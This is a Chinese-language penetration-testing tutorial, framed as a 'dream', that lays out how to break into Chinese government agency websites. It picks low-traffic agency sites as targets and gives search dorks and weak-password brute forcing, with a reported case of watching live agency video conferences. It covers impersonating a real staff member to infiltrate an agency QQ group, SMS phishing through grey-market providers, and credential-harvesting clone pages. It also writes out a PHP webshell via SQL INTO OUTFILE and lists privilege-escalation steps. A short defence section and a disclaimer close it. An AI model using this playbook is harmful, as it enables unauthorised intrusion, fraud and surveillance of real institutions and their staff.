继续聊聊梦里的那点事儿(下)
字数 2060 2025-08-18 11:38:56
网络安全渗透测试实战教学文档
0x01 信息收集方法论
1.1 目标选择策略
- 优先选择职能偏僻、群众接触少的机关单位网站
- 关注无域名仅通过IP访问的边缘系统
- 选择具有较多下属单位的大型目标作为突破口
1.2 信息收集技术
-
子域名爆破:
- 使用在线工具或lijiejie脚本进行子域名枚举
- 示例工具:Sublist3r、Amass、OneForAll
-
IP关联分析:
- 收集主域名和子域名对应IP
- 通过IP反查域名(旁站查询)
- 扫描IP开放的不同端口服务
-
C段扫描:
- 对发现的机关单位IP进行C段扫描
- 工具推荐:Masscan、Nmap
-
网络空间搜索引擎:
- FOFA:资产收集全面,相同IP查到的站比ZoomEye多
- ZoomEye:各有优势,建议结合使用
- 搜索语法:
title="政府" && country="CN"
-
Google Hacking:
- 使用高级搜索语法查找边缘资产
- 示例:
site:gov.cn intitle:"管理后台"
0x02 弱口令攻击实战
2.1 目标筛选策略
- 批量查询网站访问量,优先攻击低访问量站点
- 批量扫描常见后台路径,生成字典进行爆破
2.2 弱口令爆破流程
-
后台路径枚举:
- 使用DirBuster、Dirsearch等工具扫描常见后台路径
- 常见路径:
/admin/、/login.php、/manager/
-
验证码处理:
- 优先攻击无验证码的后台
- 有验证码的后台可尝试OCR识别或手工测试
-
密码字典构建:
- 基础弱口令:admin、admin123、123456、888888
- 默认密码:查阅系统文档获取默认凭证
- 组合密码:Admin@2023、System!123
-
爆破工具选择:
- Hydra:支持多种协议爆破
- Burp Suite Intruder:精细化爆破
- 自定义Python脚本:针对特定系统优化
2.3 成功案例
- 视频会议系统后台:通过默认凭证admin/admin123进入
- 获取权限后可:
- 远程控制视频服务器
- 查看会议日志和参与人员信息
- 下载服务器日志
- 备份数据库
- 实时观看视频会议室
0x03 社会工程学攻击
3.1 目标分析
- 针对安全性高的OA系统(无弱口令、无SQL注入/XSS)
- 通过信息收集发现站群应用QQ群
3.2 身份伪造技术
-
小号准备:
- 使用养熟的备用账号(非新建账号)
- 头像、签名、动态模仿真实用户
-
目标调研:
- 通过官网查询部门组织架构
- 收集下属单位信息
- 获取人员姓名、职位等基本信息
-
入群伪装:
- 选择30+女性职员作为伪装对象
- 准备符合身份的QQ资料
- 验证群内是否已存在该身份
3.3 群内信息收集
- 下载群文件(使用手册、培训名单、防护情况)
- 分析系统架构和部署时间线
- 获取人员联系方式(QQ、邮箱、手机号)
3.4 钓鱼攻击实施
-
邮件钓鱼:
- 使用swaks伪造邮件
- 绕过垃圾邮件过滤技巧:
- 避免敏感关键词("机关单位"等)
- 减少超链接使用
- 伪装发件人身份(如"信息管理处-小李")
-
短信钓鱼:
- 通过灰产短信服务商发送
- 伪装技巧:
- 使用【单位名称】前缀
- 内容简洁正式
- 准备备案证明等"凭证"
- 钓鱼页面构建:
- 克隆真实后台页面
- 去除验证码
- 记录提交的凭证
0x04 边缘系统渗透
4.1 目标特征
- 无域名,仅通过IP+非标准端口访问
- 使用老旧或自主开发系统
- 管理员安全意识薄弱
4.2 渗透案例
-
phpMyAdmin利用:
- 扫描发现phpMyAdmin 2.6.3
- 尝试通用密码漏洞:'localhost'@'@'
- root空密码成功登录
-
Webshell上传:
- 通过phpinfo获取真实路径
- 使用SQL命令写马:
SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/html/shell.php' - 蚁剑连接获取交互式shell
-
密码解密:
- 在phpMyAdmin中发现加密密码
- 分析网站代码找到加密函数(password.php、func.php)
- 逆向自定义加密算法获取明文密码
-
权限提升:
- 查看当前权限:
whoami(daemon) - 尝试提权方法:
- 内核漏洞提权(Dirty Cow)
- SUID提权
- 新建root权限用户
- 查看当前权限:
0x05 防御建议
5.1 针对弱口令
- 强制密码复杂度要求(大小写、数字、特殊字符)
- 定期强制修改密码
- 禁用默认账户和密码
- 实施多因素认证
5.2 针对社会工程学
- 加强群组管理,严格审核入群身份
- 敏感文件加密或设置访问权限
- 员工安全意识培训
- 建立官方通知渠道验证机制
5.3 系统安全加固
- 及时更新系统和组件补丁
- 禁用不必要的服务和端口
- 限制数据库远程访问
- 实施最小权限原则
- 定期安全审计和渗透测试
附录:工具列表
- 信息收集:Sublist3r、FOFA、ZoomEye
- 漏洞扫描:Nmap、Masscan、Dirsearch
- 密码爆破:Hydra、Burp Suite
- Webshell管理:蚁剑、C刀
- 提权工具:Dirty Cow、LinEnum
- 社会工程:SET、Swaks
注:本文所述技术仅用于合法授权测试,未经授权进行渗透测试属于违法行为。